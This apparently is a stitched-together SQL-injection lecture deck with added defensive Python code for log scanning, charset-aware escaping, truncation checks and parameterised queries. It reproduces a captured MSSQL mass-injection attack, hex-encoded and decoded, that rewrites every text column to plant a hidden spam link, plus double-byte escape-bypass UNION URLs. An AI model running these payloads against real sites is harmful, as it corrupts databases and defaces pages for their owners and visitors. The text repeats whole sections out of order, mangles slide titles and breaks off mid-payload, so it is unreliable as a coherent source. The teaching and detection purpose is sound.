• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>20 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('ALTER TABLE ['+@T+'] ALTER COLUMN ['+@C+'] varchar(8000) NOT NULL') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>80 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=CONVERT(VARCHAR(8000),['+@C+'])+''</title><style>.a4tw{position:absolute;clip:rect(457px,auto,auto,457px);}</style><div class=a4tw><a href=http://116jurist.ru >юридические-услуги-москва</a></div>'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
  (the link text is Windows-1251 Cyrillic; the slide showed it as Latin-1 mojibake)
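The three requests above share one shape: a T-SQL batch hidden as a hex literal inside cast(0x… as varchar(8000)) and run through exec(@s). As an added example (my own Python, not from the slides or from the attacked site), the block below decodes that shape out of web-server access log entries and flags the catalogue-walking, column-rewriting markers the decoded text contains. The log lines, IP addresses and the shortened payload SQL are constructed for the demo; the function and constant names are mine.

```python
import re
import urllib.parse
from typing import List, Optional, Tuple

# Added example, not from the slides: decode the cast(0x... as varchar) payload shape
# shown above and flag it in web-server access logs. Log lines and the payload SQL
# are constructed for this demo (a shortened stand-in for the decoded 116jurist.ru text).

HEX_CAST_RE = re.compile(
    r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+n?(?:var)?char\s*\(", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# Markers of a catalogue-walking, column-rewriting payload (defender's watch-list).
PAYLOAD_MARKERS = (
    "INFORMATION_SCHEMA", "CURSOR", "@@FETCH_STATUS", "EXEC(",
    "ALTER COLUMN", "UPDATE [", "</title>", "<script", "<iframe",
)


def decode_hex_payload(query_string: str) -> Optional[str]:
    """Return the SQL hidden in cast(0x... as varchar(...)) of a query string, else None."""
    text = urllib.parse.unquote_plus(query_string)
    m = HEX_CAST_RE.search(text)
    if m is None:
        return None
    hex_digits = m.group(1)
    if len(hex_digits) % 2:            # odd length: drop the dangling nibble
        hex_digits = hex_digits[:-1]
    # latin-1 never fails, so non-ASCII bytes (cp1251 link text in the real case) survive
    return bytes.fromhex(hex_digits).decode("latin-1")


def markers_in(sql: str) -> List[str]:
    upper = sql.upper()
    return [k for k in PAYLOAD_MARKERS if k.upper() in upper]


def scan_access_log(lines) -> List[Tuple[int, str, str, List[str]]]:
    """Return (line_no, client_ip, decoded_sql, markers) for each line carrying a hex-cast payload."""
    findings = []
    for i, line in enumerate(lines):
        m = REQUEST_RE.search(line)
        if m is None or "?" not in m.group(1):
            continue
        sql = decode_hex_payload(m.group(1).split("?", 1)[1])
        if sql is None:
            continue
        findings.append((i, line.split()[0], sql, markers_in(sql)))
    return findings


# Constructed sample input: a shortened payload in the same shape as the slides' decoded text.
CONSTRUCTED_SQL = (
    "set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) "
    "DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME "
    "from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t "
    "where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=''</title>'' ') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
CONSTRUCTED_HEX = "0x" + CONSTRUCTED_SQL.encode("latin-1").hex()

SAMPLE_LOG = [
    '10.0.0.5 - - [xx/Dec/2012:10:03:31 +0800] "GET /item.asp?Serno=51+declare+@s+varchar(8000)'
    '+set+@s=cast(' + CONSTRUCTED_HEX + '+as+varchar(8000))+exec(@s)-- HTTP/1.1" 200 512',
    '10.0.0.7 - - [xx/Dec/2012:10:03:32 +0800] "GET /item.asp?Serno=51 HTTP/1.1" 200 2048',
    '10.0.0.9 - - [xx/Dec/2012:10:03:33 +0800] "GET /search.asp?q=cast+iron+skillet HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for line_no, ip, sql, marks in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no} from {ip}: markers={marks}")
        print("  decoded:", sql[:72] + "...")
```

The regex keys on the cast-from-hex construct rather than on any one keyword, so the batch is caught before its content matters; the marker list then tells the responder what the batch does (here: walks INFORMATION_SCHEMA with a cursor and rewrites text columns). A benign "cast iron" search is not flagged because no 0x literal follows cast(.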
References
• 吳翰清 (Wu Hanqing), 網路竟然這麼危險 (白帽子讲Web安全), 2012
• MySQL String Functions, 5.1
• MySQL Miscellaneous Functions, 5.1
• MySQL/PHP: writing a one-line webshell via load_file/outfile when single quotes are escaped (MySQL/PHP 对单引号转义时 load_file/outfile 生成一句话)
• Shazin Sadakath, Time Based SQL Injection using heavy queries in MySQL
• Stefan Esser, MySQL and SQL Column Truncation Vulnerabilities, 2008
SQL Injection attack techniques - double-byte escape bypass (2/3)
• Chinese-language text is represented with two bytes per character
  – Big5
    • high byte 0x81-0xFE, low byte 0x40-0x7E or 0xA1-0xFE
  – GBK
    • lead byte 0x81-0xFE, trail byte 0x40-0x7E
  – GB2312
    • lead byte 0xB0-0xF7, trail byte 0xA0-0xFE
  – attack bytes: BF, CC, D5, …
SQL Injection attack techniques - double-byte escape bypass (3/3)
• Bypassing escaping on a quoted parameter
  – http://www.hackdemo.com/searchUserLash.php?name=h%B5'+AND+1=2+UNION+SELECT+1,2,3,4,2,3
  – http://www.hackdemo.com/searchUserLash.php?name=h%CC'+AND+1=2+UNION+SELECT+1,2,3,4,2,3
  – http://www.hackdemo.com/searchUserLash.php?name=h%d5'+AND+1=2+UNION+SELECT+1,2,3,4,2,3
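What the two slides above describe is a charset mismatch: the escaper works on bytes and inserts 0x5C before the quote, the server then reads the lead byte and that 0x5C as one GBK or Big5 character, and the quote is left bare. The block below is an added example (my own Python, not from the slides; the PHP functions it stands in for are named in the comments) that models a byte-oriented escaper next to a charset-aware one and checks, for a given connection charset, whether an unescaped quote survives. The probe bytes are constructed from the BF lead byte listed on the slide.

```python
# Added example, not from the slides: my own Python model of a charset-unaware escaper
# (addslashes() or an escape call made without the connection charset) next to a
# charset-aware one, showing why the %BF' trick works under GBK and not under UTF-8.

def escape_like_addslashes(data: bytes) -> bytes:
    """Byte-oriented escaping: a backslash is inserted before ' " \\ and NUL, byte by byte."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def quote_survives(escaped: bytes, charset: str) -> bool:
    """True if the server, decoding `escaped` in `charset`, still sees an unescaped quote."""
    try:
        text = escaped.decode(charset)
    except UnicodeDecodeError:
        return False          # not valid text in that charset: the server rejects it
    escaped_next = False
    for ch in text:
        if escaped_next:
            escaped_next = False
            continue
        if ch == "\\":
            escaped_next = True
        elif ch == "'":
            return True
    return False


def escape_charset_aware(data: bytes, charset: str):
    """Decode first, escape per character, re-encode; None if the bytes are not valid text.
    This is what mysqli_set_charset() followed by real_escape_string() gives you;
    prepared statements sidestep the problem entirely."""
    try:
        text = data.decode(charset)
    except UnicodeDecodeError:
        return None
    out = []
    for ch in text:
        if ch in "'\"\\\x00":
            out.append("\\")
        out.append(ch)
    return "".join(out).encode(charset)


if __name__ == "__main__":
    probe = b"h\xbf'"   # constructed: the BF lead byte from the slide, then a quote
    naive = escape_like_addslashes(probe)
    print("naive escaping ->", naive)
    for cs in ("gbk", "big5", "utf-8"):
        print(f"  decoded as {cs}: quote survives = {quote_survives(naive, cs)}")
    print("charset-aware (gbk) on probe ->", escape_charset_aware(probe, "gbk"))
    print("charset-aware (gbk) on valid text ->", escape_charset_aware("中'".encode("gbk"), "gbk"))
```

Under GBK the naive result b"h\xbf\\'" decodes to "h縗'" with the quote intact; under UTF-8 the same bytes are not valid text at all, which is the practical content of the deck's "use UTF-8, avoid Big5/GBK" advice. The charset-aware path refuses the probe outright (0xBF followed by 0x27 is not a GBK sequence) and escapes genuine multibyte input correctly.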
SQL Column Truncation – overview (1/3)
• MySQL SQL mode
  – STRICT_ALL_TABLES not enabled
    • Inserting data longer than the column produces a warning
    • but the row is still inserted
  – STRICT_ALL_TABLES enabled
    • Inserting data longer than the column produces a message
    • ERROR 1406; the row is not inserted
• Incident
  – 2008-09-07
    • WordPress 2.6.1 SQL Column Truncation Vulnerability
SQL Column Truncation - effect (2/3)
SQL Column Truncation - mitigations (3/3)
• Proactively strip whitespace from strings that must not contain any
  – e.g. account names
• Add BINARY to the comparison when SELECTing
• Configure MySQL to compare as BINARY by default
• Enable STRICT_ALL_TABLES in MySQL
  – Exceeding the column length raises an ERROR instead of a WARNING
  – To avoid failures on insert, extra length checks may be needed in the insert/update code
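To make the two MySQL behaviours the slides rely on concrete, the block below is an added example (my own toy Python model, not MySQL and not from the slides): a VARCHAR(16) username column that silently truncates in non-strict mode and compares with trailing spaces ignored, as PAD SPACE collations in MySQL 5.x do. It registers "admin", then a constructed look-alike that overflows the column, and reports whether a lookup for "admin" now returns two rows. Each flag corresponds to one mitigation listed above; the names are mine.

```python
# Added example, not from the slides: a toy model of MySQL VARCHAR(n) storage and
# comparison, used to show how an over-length username collides with an existing one
# in non-strict sql_mode and which of the listed mitigations closes it.

class TruncationError(Exception):
    """Models MySQL ERROR 1406 'Data too long' raised under STRICT_ALL_TABLES."""


class UserTable:
    """Not MySQL itself: it reproduces only silent truncation in non-strict mode
    and PAD SPACE comparison that ignores trailing spaces."""

    def __init__(self, width, strict=False, binary=False, strip_spaces=False):
        self.width = width
        self.strict = strict              # sql_mode contains STRICT_ALL_TABLES
        self.binary = binary              # SELECT ... WHERE BINARY username = ?
        self.strip_spaces = strip_spaces  # application removes whitespace from usernames
        self.rows = []                    # (username, password)

    def normalise(self, value):
        if self.strip_spaces:
            value = "".join(value.split())     # usernames must not contain whitespace
        if len(value) > self.width:
            if self.strict:
                raise TruncationError(
                    f"Data too long for column 'username' ({len(value)} > {self.width})")
            value = value[: self.width]        # non-strict: WARNING, row stored truncated
        return value

    def equal(self, stored, wanted):
        if self.binary:
            return stored == wanted            # byte-wise, trailing spaces matter
        return stored.rstrip(" ") == wanted.rstrip(" ")   # PAD SPACE collation

    def insert(self, username, password):
        stored = self.normalise(username)
        self.rows.append((stored, password))
        return stored

    def find(self, username):
        return [row for row in self.rows if self.equal(row[0], username)]


def run_scenario(strict=False, binary=False, strip_spaces=False):
    """Register 'admin', then a look-alike that overflows the column; report the outcome."""
    users = UserTable(width=16, strict=strict, binary=binary, strip_spaces=strip_spaces)
    users.insert("admin", "real-secret")
    lookalike = "admin" + " " * 11 + "x"       # 17 chars, constructed for the demo
    try:
        users.insert(lookalike, "second-password")
    except TruncationError:
        return "rejected"
    hits = users.find("admin")
    return "collision" if len(hits) == 2 else "isolated"


if __name__ == "__main__":
    print("default (non-strict, PAD SPACE):", run_scenario())
    print("STRICT_ALL_TABLES:", run_scenario(strict=True))
    print("BINARY comparison:", run_scenario(binary=True))
    print("whitespace stripped by the application:", run_scenario(strip_spaces=True))
```

In the default configuration the look-alike is stored as "admin" followed by eleven spaces and matches a lookup for "admin"; strict mode refuses the insert, BINARY comparison keeps the two rows apart, and stripping whitespace turns the input into "adminx", which is a different name. Note that MySQL 8.0's default utf8mb4_0900 collations are NO PAD, so the comparison half of the model describes the 5.x era the slides come from.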
SQL Injection – further thoughts
• Can injection also happen through INSERT and UPDATE?
• NoSQL has no SQL Injection?
• Other exploitation techniques
  – Deep Blind Injection
  – Error-Based Injection
    • Duplicate Error
    • Function
  – information_schema
  – User-Defined Functions
  – Triggers
SQL Injection – automated tools
• Havij
• Pangolin
• w3af
• Jsky
• SQLmap
• …
Defending against SQL Injection properly
• Principle of least privilege
• Use prepared (precompiled) statements
• Use stored procedures/functions
• Use UTF-8; avoid BIG5 and GBK
• Check data types and cast explicitly
  – bool settype(mixed &$var, string $type)
  – intval, doubleval
• Use safe encoding functions
  – OWASP ESAPI
    • MySQLCodec
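The deck's getUser.php?id= example is the case these last points are meant for. As an added example (my own Python on SQLite, not from the slides), the block below puts the concatenating query beside a hardened one that applies two of the items above: an explicit type check (the intval counterpart) and a parameterised statement. The probes are the deck's own "1 and 1=1" / "1 and 1=2" pair; the table rows are constructed for the demo.

```python
import sqlite3

# Added example, not from the slides: the deck's getUser.php pattern rebuilt in Python on
# SQLite, vulnerable form beside the hardened form (type check, the intval counterpart,
# plus a parameterised statement). Table contents are constructed for the demo.

def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        (1, "alice", "alice@example.test"),
        (2, "bob", "bob@example.test"),
        (3, "carol", "carol@example.test"),
    ])
    return conn


def get_user_vulnerable(conn, user_id: str):
    # String concatenation: whatever arrives in ?id= is parsed as SQL.
    return conn.execute("SELECT id, name FROM users WHERE id=" + user_id).fetchall()


def get_user_safe(conn, user_id: str):
    # 1) Force the type: anything that is not an integer is refused before it reaches SQL.
    try:
        uid = int(user_id)
    except ValueError:
        return []
    # 2) Prepared/parameterised statement: the value is bound, never spliced into the text.
    return conn.execute("SELECT id, name FROM users WHERE id=?", (uid,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", "1 and 1=1", "1 and 1=2"):
        print(f"id={probe!r}: vulnerable -> {get_user_vulnerable(db, probe)}"
              f"  safe -> {get_user_safe(db, probe)}")
```

With the vulnerable function the two probes return different result sets, which is exactly the signal the deck's "判斷是否有弱點" slide relies on; with the hardened one both probes are rejected at the type check and only a genuine integer id reaches the database, where it is bound as a value. Least privilege on the database account is the remaining layer: it does not stop injection, but it bounds what a successful one can read or change.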
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
MSSQL real-world case - 116jurist.ru automated injection, decoded (4/4)
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
  c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
  in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and
  t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
  BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=SUBSTRING(['+@C+'], 1, CHARINDEX(''</title><'',['+@C+']) - 1) where
  ['+@C+'] like ''%</title><%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
  c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
  in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>20 and t.table_name=c.table_name and
  t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
  BEGIN EXEC('ALTER TABLE ['+@T+'] ALTER COLUMN ['+@C+'] varchar(8000) NOT NULL') FETCH NEXT FROM Table_Cursor INTO
  @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
• set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
  c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE
  in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>80 and t.table_name=c.table_name and
  t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
  BEGIN EXEC('UPDATE ['+@T+'] SET
  ['+@C+']=CONVERT(VARCHAR(8000),['+@C+'])+''</title><style>.a4tw{position:absolute;clip:rect(457px,auto,auto,457px);}</style>
  <div class=a4tw><a href=http://116jurist.ru >юридические-услуги-москва</a></div>'' ') FETCH NEXT FROM
  Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
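The three decoded batches above form one sequence: the first strips an earlier `</title><` insertion from every text column, the second widens those columns to varchar(8000), the third appends the hidden link. In the access log each arrives as one hex literal inside cast(0x… as varchar(8000)) handed to exec(), so a keyword rule on the raw request line sees nothing. Added example, not code from the slides: a Python log scanner that unhexes that literal before matching; the log lines, field names and the harmless batch it decodes are constructed here.

```python
"""Decode and flag hex-wrapped T-SQL batches found in web server access logs."""
import binascii
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Wrapper used by the captured requests: cast(0x<hex> as varchar(8000)).
HEX_CAST_RE = re.compile(r"cast\s*\(\s*0x([0-9a-f]+)\s+as\s+n?(?:var)?char", re.IGNORECASE)
EXEC_RE = re.compile(r"\bexec\s*\(", re.IGNORECASE)
# Request target of a combined-log-format line.
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# Keywords that, once the literal is decoded, point at a schema walk or mass update.
SUSPICIOUS_KEYWORDS = ("DECLARE", "CURSOR", "INFORMATION_SCHEMA", "UPDATE",
                       "ALTER TABLE", "CHARINDEX", "</title>", "<script", "<style")


def decode_hex_literal(hex_digits: str) -> str:
    """Turn the 0x... literal back into text. MSSQL treats the bytes as single-byte
    characters, so latin-1 round-trips every byte without raising."""
    if len(hex_digits) % 2:          # capture cut mid-byte: drop the dangling nibble
        hex_digits = hex_digits[:-1]
    return binascii.unhexlify(hex_digits).decode("latin-1")


def analyse_query(query: str) -> Optional[Dict]:
    """Return a finding for one request target, or None when no hex cast is present."""
    text = unquote_plus(query)       # '+' and %xx exactly as the server would see them
    m = HEX_CAST_RE.search(text)
    if not m:
        return None
    payload = decode_hex_literal(m.group(1))
    upper = payload.upper()
    hits = [k for k in SUSPICIOUS_KEYWORDS if k.upper() in upper]
    wrapped_in_exec = bool(EXEC_RE.search(text))
    return {
        "payload": payload,
        "keywords": hits,
        "exec_wrapper": wrapped_in_exec,
        "severity": "high" if hits and wrapped_in_exec else "medium",
    }


def scan_log(lines: List[str]) -> List[Dict]:
    """Run analyse_query over the request target of every log line."""
    findings = []
    for n, line in enumerate(lines, 1):
        req = REQUEST_RE.search(line)
        if not req:
            continue
        finding = analyse_query(req.group(1))
        if finding:
            finding["line"] = n
            findings.append(finding)
    return findings


# Constructed sample: a harmless batch shaped like the slides' payloads,
# hex-encoded the same way the attacker's tool encoded its own.
SAMPLE_BATCH = ("DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR "
                "select c.TABLE_NAME from INFORMATION_SCHEMA.columns c "
                "EXEC('UPDATE ['+@T+'] SET ['+@C+']=''demo''')")
SAMPLE_HEX = SAMPLE_BATCH.encode("latin-1").hex()

# Constructed access-log lines; the first request is benign, the second carries the cast.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Dec/2012:10:03:29 +0800] "GET /show.asp?Serno=51 HTTP/1.1" 200 512',
    '203.0.113.5 - - [05/Dec/2012:10:03:31 +0800] "GET /show.asp?Serno=51+declare+@s+varchar(8000)'
    f'+set+@s=cast(0x{SAMPLE_HEX}+as+varchar(8000))+exec(@s)-- HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['severity']} {f['keywords']}")
        print("  decoded:", f["payload"][:80])
```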
References
• 吳翰清, 網路竟然這麼危險 (白帽子讲Web安全), 2012
• MySQL String Functions (5.1)
• MySQL Miscellaneous Functions (5.1)
• MySQL/PHP: 对单引号转义时 load_file/outfile 生成一句话 (generating a one-line webshell with load_file/outfile when single quotes are escaped)
• Shazin Sadakath, Time Based SQL Injection using heavy queries in MySQL
• Stefan Esser, MySQL and SQL Column Truncation Vulnerabilities, 2008
SQL Column Truncation - Defences (3/3)
• Actively strip whitespace from strings that should never contain any
  – e.g. account identifiers
• Add the BINARY modifier when SELECTing the data
• Configure MySQL to compare with BINARY by default
• Enable STRICT_ALL_TABLES in MySQL
  – Values longer than the column then raise an ERROR instead of a WARNING
  – To avoid errors on insert, the insert/update code may need extra checks
SQL Injection – Further thoughts
• Can INSERT and UPDATE statements be attacked too?
• Is NoSQL free of SQL injection?
• Other ways to exploit it
  – Deep Blind Injection
  – Error-Based Injection
    • Duplicate Error
    • Function
  – information_schema
  – User-Defined Functions
  – Triggers
SQL Injection – Automated tools
• Havij
• Pangolin
• w3af
• Jsky
• SQLmap
• …
Defending against SQL Injection properly
• Principle of least privilege
• Use prepared statements
• Use stored procedures
• Use UTF-8; avoid BIG5 and GBK
• Check data types and force-cast
  – bool settype(mixed &$var, string $type)
  – intval, doubleval
• Use safe functions
  – OWASP ESAPI
    • MySQLCodec
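Two of the items above, type enforcement before the query and a prepared statement with bound parameters, together with the application-side check the Column Truncation defence slide asks for (no whitespace in account names, length checked before insert). Added example, not code from the slides: the vulnerable lookup beside its hardened form, using Python's sqlite3 as a stand-in for MySQL; the users table, its assumed 16-character name column and the sample rows are constructed here, and int() plays the role of intval()/settype().

```python
"""Vulnerable vs. hardened user lookup, plus the registration check that
defeats column truncation. sqlite3 stands in for MySQL so this runs offline;
sqlite does not silently truncate, so the check lives in the application."""
import sqlite3
from typing import List, Tuple

USERNAME_MAX = 16  # assumed width of the VARCHAR(16) name column
Row = Tuple[int, str, str]


def setup_db() -> sqlite3.Connection:
    """Constructed demo table with two accounts."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT UNIQUE, role TEXT)")
    con.executemany("INSERT INTO users(name, role) VALUES(?, ?)",
                    [("admin", "administrator"), ("alice", "member")])
    return con


def get_user_unsafe(con: sqlite3.Connection, user_id: str) -> List[Row]:
    """The getUser.php?id=... pattern: the raw parameter is spliced into the
    statement, so an id of '1 or 1=1' returns every row."""
    return con.execute(f"SELECT id, name, role FROM users WHERE id = {user_id}").fetchall()


def get_user_safe(con: sqlite3.Connection, user_id: str) -> List[Row]:
    """'Check the data type and force-cast' + 'use prepared statements':
    anything that is not an integer is rejected, the rest is bound, never spliced."""
    try:
        uid = int(user_id)            # the intval()/settype() step
    except ValueError:
        raise ValueError("id must be an integer")
    return con.execute("SELECT id, name, role FROM users WHERE id = ?", (uid,)).fetchall()


def normalize_username(raw: str) -> str:
    """Column-truncation defence: an account name may contain no whitespace at all
    and must fit the column, so 'admin' padded with spaces past the column width
    can never be cut down by the server to a name that already exists."""
    if not raw:
        raise ValueError("username must not be empty")
    if any(ch.isspace() for ch in raw):
        raise ValueError("username must not contain whitespace")
    if len(raw) > USERNAME_MAX:
        raise ValueError(f"username longer than {USERNAME_MAX} characters")
    return raw


def register(con: sqlite3.Connection, raw_name: str) -> bool:
    """Insert a new account; False when the exact name is already taken."""
    name = normalize_username(raw_name)
    # Exact, case-sensitive comparison (what the BINARY modifier gives you in MySQL).
    if con.execute("SELECT 1 FROM users WHERE name = ?", (name,)).fetchone():
        return False
    con.execute("INSERT INTO users(name, role) VALUES(?, 'member')", (name,))
    return True


def rejects(fn, *args) -> bool:
    """True when fn(*args) raises ValueError; used by the demo below."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = setup_db()
    print("unsafe, id='1 or 1=1':", get_user_unsafe(db, "1 or 1=1"))
    print("safe,   id='1':", get_user_safe(db, "1"))
    print("safe rejects '1 or 1=1':", rejects(get_user_safe, db, "1 or 1=1"))
    print("register 'admin' + padding + 'x' rejected:", rejects(register, db, "admin           x"))
```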
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
